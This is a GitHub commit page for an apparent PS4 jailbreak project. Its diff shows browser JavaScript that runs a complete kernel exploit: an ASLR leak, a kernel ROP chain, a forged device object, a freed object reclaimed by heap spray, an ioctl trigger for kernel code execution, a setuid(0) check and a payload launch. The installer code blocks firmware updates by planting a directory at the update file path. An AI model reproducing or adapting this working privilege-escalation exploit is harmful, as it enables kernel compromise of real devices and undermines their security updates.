Skip to content

Commit

Permalink
Update blocker v2
Browse files Browse the repository at this point in the history
  • Loading branch information
@xvortex
xvortex committed Feb 5, 2018
1 parent a15b09a commit 83b1348
Show file tree
Hide file tree
Showing 8 changed files with 381 additions and 242 deletions.
42 changes: 21 additions & 21 deletions exploit/index.html
View file
Original file line number Diff line number Diff line change
Expand Up @@ -396,17 +396,17 @@

if(kexploitCheck == 0)
{
//print("Status: Kernel Patched!");
print("Status: Kernel Patched!");
}

if(kexploitCheck != 0)
{
//print("Status: Kernel Not Patched...");
print("Status: Kernel Not Patched...");
print("=== Starting Kernel Exploit Chain ===");

//////////////// SETUP ////////////////

//print("Allocating Buffers...");
print("Allocating Buffers...");

// Setup buffers for important pre-exploit stuff
var kernelBase = malloc(0x08);
Expand Down Expand Up @@ -437,7 +437,7 @@

//////////////// LEAK ////////////////

//print("Calculating ASLR and Object Base...");
print("Calculating ASLR and Object Base...");

p.write8(namedObj, p.syscall('sys_namedobj_create', stringify("debug"), 0xDEAD, 0x5000));

Expand All @@ -462,14 +462,14 @@
return false;
}

//print("Kernel base: 0x" + kernelBase);
//print("Object leak: 0x" + objBase);
print("Kernel base: 0x" + kernelBase);
print("Object leak: 0x" + objBase);

p.write8(serviceBuff.add32(0x4), objBase);
p.writeString(serviceBuff.add32(0x28), "debug");

//////////////// BUILD KROP CHAIN ////////////////
//print("Building Kernel ROP Chain...");
print("Building Kernel ROP Chain...");

var kchainstack = malloc(0x200);
var kchain = new krop(p, kchainstack);
Expand Down Expand Up @@ -524,10 +524,10 @@
kchain.push(window.gadgets["pop rsp"]);
kchain.push(window.gadgets["push rax; jmp rcx"]);

//print("KROP chain size: " + kchain.count);
print("KROP chain size: " + kchain.count);

//////////////// FAKE THE OBJECT ////////////////
//print("Creating Fake Object...");
print("Creating Fake Object...");

//////// FAKE CDEV_PRIV ////////
p.write8(obj_cdev_priv.add32(0x008), 0x0000000000000004);
Expand All @@ -549,14 +549,14 @@
p.write8(obj_cdevsw.add32(0x38), libcBase.add32(0xa826f)); // d_ioctl - TARGET FUNCTION POINTER

//////////////// FREE THE OBJECT ////////////////
//print("Freeing the object!");
print("Freeing the object!");

var stage3 = new saferop(p, undefined);

stage3.call(libkernel.add32(window.syscalls[window.syscallnames['sys_mdbg_service']]), 1, serviceBuff, 0);
stage3.call(libkernel.add32(window.syscalls[window.syscallnames['sys_namedobj_delete']]), p.read8(namedObj), 0x5000);

//print("Spraying the heap!");
print("Spraying the heap!");

for(var i = 0; i < 500; i++)
{
Expand All @@ -566,12 +566,12 @@
stage3.run();

//////////////// TRIGGER ////////////////
//print("Triggering kernel code execution");
print("Triggering kernel code execution");

p.syscall('sys_ioctl', p.read8(targetDevFd), 0x81200000, obj_cdev_priv);

//////////////// FIX ////////////////
//print("Allocating executable memory for fix payload...");
print("Allocating executable memory for fix payload...");

var baseAddressExecute = new int64(0xDEAD0000, 0);
var exploitExecuteAddress = p.syscall("sys_mmap", baseAddressExecute, 0x10000, 7, 0x1000, -1, 0);
Expand All @@ -587,7 +587,7 @@
p.write4(shellcode.add32(i * 4), fix[i]);
}

//print("Running fix payload...");
print("Running fix payload...");

var stage6 = new saferop(p, undefined);

Expand All @@ -603,8 +603,8 @@
// Display results
print("=== Verifying kexploit patches ===");

//print("setuid(0): " + p.syscall('sys_setuid', 0));
//print("getuid(): " + p.syscall('sys_getuid'));
print("setuid(0): " + p.syscall('sys_setuid', 0));
print("getuid(): " + p.syscall('sys_getuid'));

// Create payload memory
print("=== Launching Payload ===");
Expand Down Expand Up @@ -636,20 +636,20 @@
for (;;)
{
var result = p.call(libkernel.add32(0x11570), thread_id_ptr, 0, code_addr, 0, thread_name);
//print("scePthreadCreate: 0x" + result);
print("scePthreadCreate: 0x" + result);
if (result == 0)
{
var thread_id = p.read8(thread_id_ptr);
//print("thread: 0x" + thread_id);
print("thread: 0x" + thread_id);
var result = p.call(libkernel.add32(0x11610), thread_id, exit_code_ptr);

//print("scePthreadJoin: 0x" + result);
print("scePthreadJoin: 0x" + result);
if (result == 0)
{
var exit_code = p.read8(exit_code_ptr);
//print("exit code: " + exit_code);
print("exit code: " + exit_code);
print("=== Done ===");
alert(document.getElementById("console").innerHTML);
alert("Done");
break;
}
}
Expand Down
2 changes: 1 addition & 1 deletion exploit/payload.js
View file

Large diffs are not rendered by default.

2 changes: 1 addition & 1 deletion installer/Makefile
View file
Original file line number Diff line number Diff line change
Expand Up @@ -10,7 +10,7 @@ ODIR := build
SDIR := source
IDIRS := -I$(LIBPS4)/include -I. -Iinclude
LDIRS := -L$(LIBPS4) -L. -Llib
CFLAGS := $(IDIRS) -Os -std=gnu11 -fno-builtin -nostartfiles -nostdlib -fno-strict-aliasing -Wall -masm=intel -march=btver2 -mtune=btver2 -m64 -mabi=sysv -mcmodel=large
CFLAGS := $(IDIRS) -O3 -std=gnu11 -fno-builtin -nostartfiles -nostdlib -fno-strict-aliasing -Wall -masm=intel -march=btver2 -mtune=btver2 -m64 -mabi=sysv -mcmodel=large
SFLAGS := -nostartfiles -nostdlib -masm=intel -march=btver2 -mtune=btver2 -m64 -mabi=sysv -mcmodel=large
LFLAGS := $(LDIRS) -Xlinker -T $(LIBPS4)/linker.x -Wl,--build-id=none -Ttext=$(TEXT) -Tdata=$(DATA)
CFILES := $(wildcard $(SDIR)/*.c)
Expand Down
2 changes: 1 addition & 1 deletion installer/include/defines.h
View file
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
#ifndef __DEFINES
#define __DEFINES

#define VERSION "1.1"
#define VERSION "1.2"

//#define DEBUG_SOCKET

Expand Down
9 changes: 6 additions & 3 deletions installer/source/main.c
View file
Original file line number Diff line number Diff line change
Expand Up @@ -7,6 +7,7 @@
#define kernel_printf(format, ...) (void)0

#define PS4_UPDATE_FULL_PATH "/update/PS4UPDATE.PUP"
#define PS4_UPDATE_TEMP_PATH "/update/PS4UPDATE.PUP.net.temp"

const uint8_t payload_data_const[] =
{
Expand Down Expand Up @@ -284,16 +285,18 @@ int kernel_payload(struct thread *td, struct kernel_payload_args* args)

static inline void patch_update(void)
{
DIR* directory = opendir(PS4_UPDATE_FULL_PATH);
unlink(PS4_UPDATE_FULL_PATH);

DIR* directory = opendir(PS4_UPDATE_TEMP_PATH);

if(directory != NULL)
{
closedir(directory);
return;
}

unlink(PS4_UPDATE_FULL_PATH);
mkdir(PS4_UPDATE_FULL_PATH, 0777);
unlink(PS4_UPDATE_TEMP_PATH);
mkdir(PS4_UPDATE_TEMP_PATH, 0777);
}

int _main(struct thread *td) {
Expand Down
Loading

0 comments on commit 83b1348

Please sign in to comment.